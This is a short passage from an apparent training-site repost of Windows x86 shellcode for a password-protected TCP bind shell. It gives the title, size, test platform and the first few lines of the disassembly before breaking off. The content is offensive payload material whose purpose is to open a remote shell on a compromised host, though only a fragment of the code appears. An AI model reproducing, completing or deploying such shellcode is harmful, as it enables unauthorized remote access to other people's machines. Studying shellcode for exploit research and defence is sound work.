Windows/x86 – Password Protected TCP Bind Shell
Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credits: Brother Roziul Hasan Khan
/*
# Title : Windows x86 password protected bind shell tcp shellcode
# size : 637 bytes
# Tested On : Windows 7 ultimate x86 x64
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 99 cltd
1: 64 8b 42 30 mov %fs:0x30(%edx),%eax
5: 8b 40 0c mov 0xc(%eax),%eax
8: 8b […]